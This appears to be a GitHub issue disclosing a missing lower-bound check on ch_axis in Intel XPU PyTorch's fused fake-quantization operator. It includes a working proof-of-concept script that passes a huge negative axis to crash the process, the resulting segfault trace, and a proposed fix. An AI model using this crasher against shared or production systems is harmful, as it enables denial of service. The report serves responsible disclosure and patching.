Bound check in fused_moving_avg_obs_fake_quant_xpu

The Intel XPU implementation of `fused_moving_avg_obs_fake_quant_xpu` validates only the upper bound of `ch_axis`:

```cpp
TORCH_CHECK(
    ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
    "self.dim()");
```

However, in the `per_row_fq` path, the same value is later used as an index into a native `DimVector`:

```cpp
auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;

y = x.permute(res);
```

There is no lower-bound validation such as:

```cpp
ch_axis >= 0
```

or canonicalization through a dimension-wrapping helper such as `maybe_wrap_dim`.

A large negative `ch_axis` therefore passes the explicit check (`ch_axis < x.dim()`) and reaches native C++ code in the XPU backend. In testing, this causes a deterministic segmentation fault in `libtorch_xpu.so`.

This is reachable from public Python APIs in the Intel XPU PyTorch wheel.





**Proof of Concept**

The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.

```bash
set -euo pipefail

mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate

python -m pip install --upgrade pip setuptools wheel

# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu

# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
    print("xpu device:", torch.xpu.get_device_name(0))
PY

# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch

print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)

device = "xpu"

x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)

print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)

out = torch.fused_moving_avg_obs_fake_quant(
    x,
    observer_on,
    fake_quant_on,
    running_min,
    running_max,
    scale,
    zero_point,
    0.0,
    0,
    0,
    -1250999896764,
    True,
    True,
)

torch.xpu.synchronize()
print("returned:", out, flush=True)
PY

# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py

echo "exit code: $?"
```


The process crashes with a segmentation fault:

```text
torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:

Fatal Python error: Segmentation fault

Current thread ... [python] (most recent call first):
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>

Current thread's C stack trace:
  ...
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
  ...

Segmentation fault
exit code: 139
```

The same crash was also reproduced through the helper-path operator with:

```python
torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)
```

and through the public operator with:

```python
torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)
```

Both crashed with `exit code 139` and stack frames in `libtorch_xpu.so`.


## Impact
A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.

Impact:

Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption due to unchecked native indexing
Affects public Python API usage, not only internal C++ calls

## Recommended solution
Add explicit lower-bound validation or canonicalization for ch_axis before it is used.

For example:
```
TORCH_CHECK(
    ch_axis >= 0 && ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");
```

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Bound check in fused_moving_avg_obs_fake_quant_xpu #3963

Impact

Recommended solution

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Bound check in fused_moving_avg_obs_fake_quant_xpu #3963

Description

Impact

Recommended solution

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions